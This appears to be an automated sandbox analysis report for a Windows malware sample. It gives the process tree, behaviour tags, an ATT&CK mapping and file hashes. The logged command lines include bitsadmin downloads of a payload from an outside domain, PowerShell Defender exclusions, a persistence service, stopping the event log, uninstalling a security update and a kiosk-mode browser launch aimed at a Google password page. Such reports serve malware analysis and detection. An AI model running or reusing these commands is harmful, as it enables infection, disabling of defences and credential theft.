- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1088
-
-
C:\Users\Admin\AppData\Local\Temp\10103160101\4973aedce1.exe"C:\Users\Admin\AppData\Local\Temp\10103160101\4973aedce1.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1684 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1684 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103170101\bc5700b2c7.exe"C:\Users\Admin\AppData\Local\Temp\10103170101\bc5700b2c7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2836 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6fc9758,0x7fef6fc9768,0x7fef6fc97788⤵PID:1928
-
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:28⤵PID:880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1488 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:88⤵PID:1360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:88⤵PID:992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2240 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2480 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:1192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2496 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1372 --field-trial-handle=1128,i,14854914207755404350,10017691915617191467,131072 /prefetch:28⤵PID:2868
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3280 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef4fc9758,0x7fef4fc9768,0x7fef4fc97788⤵PID:3292
-
-
C:\Windows\system32\ctfmon.exectfmon.exe8⤵PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1080 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:28⤵PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:88⤵PID:3664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:88⤵PID:3684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2316 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2696 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2724 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1420 --field-trial-handle=1244,i,15605378753839231940,12831261769223089488,131072 /prefetch:28⤵PID:4040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103180101\f6a3f4768e.exe"C:\Users\Admin\AppData\Local\Temp\10103180101\f6a3f4768e.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2500 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1852
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1960 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.0.1739491612\876185954" -parentBuildID 20221007134813 -prefsHandle 1260 -prefMapHandle 1256 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e27adc86-8a40-413b-a7f0-8a15a9ed24d1} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 1360 108ee158 gpu9⤵PID:836
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.1.582959608\1206127162" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1508 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {782e4c88-b4c3-4f47-9b39-ea757e0e4402} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 1536 44c9b58 socket9⤵PID:936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.2.1063755586\567936510" -childID 1 -isForBrowser -prefsHandle 2100 -prefMapHandle 2096 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 620 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f60b870b-658c-4c6a-a39f-d97a795b12ad} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 2120 17dac258 tab9⤵PID:2064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.3.1286376932\1584898052" -childID 2 -isForBrowser -prefsHandle 604 -prefMapHandle 528 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 620 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6853544d-edb4-426b-8e72-7b7413572ab3} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 2568 1bace258 tab9⤵PID:2712
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.4.24507437\1417480896" -childID 3 -isForBrowser -prefsHandle 3912 -prefMapHandle 3404 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 620 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a564748-ebcd-4ad0-b7fa-91bad253b5c7} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 3924 200e5458 tab9⤵PID:1716
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.5.646788925\1058749774" -childID 4 -isForBrowser -prefsHandle 4036 -prefMapHandle 4040 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 620 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a587f04-8dde-421a-8c92-5048214ea8e1} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 4024 200e6c58 tab9⤵PID:692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1960.6.1992764198\2002291679" -childID 5 -isForBrowser -prefsHandle 4100 -prefMapHandle 4092 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 620 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1fb0de05-6b7f-4b04-a47e-c96e234f7a77} 1960 "\\.\pipe\gecko-crash-server-pipe.1960" 4112 20c04258 tab9⤵PID:1744
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103190101\dbc71c9fa1.exe"C:\Users\Admin\AppData\Local\Temp\10103190101\dbc71c9fa1.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10103201121\fCsM05d.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:3872 -
C:\Windows\SysWOW64\fltMC.exefltmc7⤵
- System Location Discovery: System Language Discovery
PID:3892
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1152
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\Admin\AppData\Local\Temp\vrep_install\Client32.ini"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3516
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\Admin\AppData\Local\Temp\vrep_install\NSM.lic"7⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103210101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10103210101\FvbuInU.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\10103220101\OEHBOHk.exe"C:\Users\Admin\AppData\Local\Temp\10103220101\OEHBOHk.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:3368 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:3520
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵
- Drops file in Windows directory
PID:4076
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "DWENDQPG"7⤵
- Launches sc.exe
PID:3560
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"7⤵
- Launches sc.exe
PID:4080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:3728
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "DWENDQPG"7⤵
- Launches sc.exe
PID:3344
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103230101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10103230101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 10407⤵
- Loads dropped DLL
- Program crash
PID:3956
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103240101\Y87Oyyz.exe"C:\Users\Admin\AppData\Local\Temp\10103240101\Y87Oyyz.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3832 -
C:\Windows\Temp\{E9AD13C7-1D57-45C8-A950-81878DAEB572}\.cr\Y87Oyyz.exe"C:\Windows\Temp\{E9AD13C7-1D57-45C8-A950-81878DAEB572}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10103240101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=1887⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3384 -
C:\Windows\Temp\{BC4E9261-E050-456B-B4AA-6B9C0D16EE45}\.ba\SplashWin.exeC:\Windows\Temp\{BC4E9261-E050-456B-B4AA-6B9C0D16EE45}\.ba\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3480 -
C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exeC:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3636 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
PID:4092
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10103250101\SvhQA35.exe"C:\Users\Admin\AppData\Local\Temp\10103250101\SvhQA35.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\onefile_3316_133856567547162000\chromium.exeC:\Users\Admin\AppData\Local\Temp\10103250101\SvhQA35.exe7⤵
- Executes dropped EXE
PID:3424
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:2060
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3124
-
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exeC:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:3924 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:2552
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:3260
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:264
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:532
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:1064
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Modify Authentication Process
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
BITS Jobs
1Impair Defenses
6Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
Filesize
288KB
MD502b209f8c8110fe9ecead683feb94c33
SHA10d02d1f2fc5fd0b65c781f4c7aa45aa7a299acc5
SHA256d0384d47be584abc61d5830c0cfe424661de6c0719ceb890a6ed1ca8cd2afba2
SHA512e274ade9e10120c774b2f9778d159d80f915ce294b717b15aa6445cb4a13c7a59f28519f5b207fd4b1a415a56554133d3d0d04d914680ec0d6d67565f6a290bc
-
Filesize
92KB
MD5102841a614a648b375e94e751611b38f
SHA11368e0d6d73fa3cee946bdbf474f577afffe2a43
SHA256c82ee2a0dc2518cb1771e07ce4b91f5ef763dd3dd006819aece867e82a139264
SHA512ca18a888dca452c6b08ad9f14b4936eb9223346c45c96629c3ee4dd6742e947b6825662b42e793135e205af77ad35e6765ac6a2b42cefed94781b3463a811f0a
-
Filesize
5.0MB
MD5c5ec8e3a3ac8a0b4def250704fadbe97
SHA10673f991bef6c568e04e37ae93567ab6369b8b46
SHA256d72959f1ac7ba38109198851384bac6b086b0b4d859334719d8898b81ce4ca70
SHA5122094ed53e365418bfc58ea71947280e71f712a20a28c1f49c44b3128032796a3066323a717dc74e4240fd03187c007660b285a5a300d5603d68ae61847e562d0
-
Filesize
96KB
MD5d367ddfda80fdcf578726bc3b0bc3e3c
SHA123fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA2560b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA51240e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
16B
MD518e723571b00fb1694a3bad6c78e4054
SHA1afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA2568af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
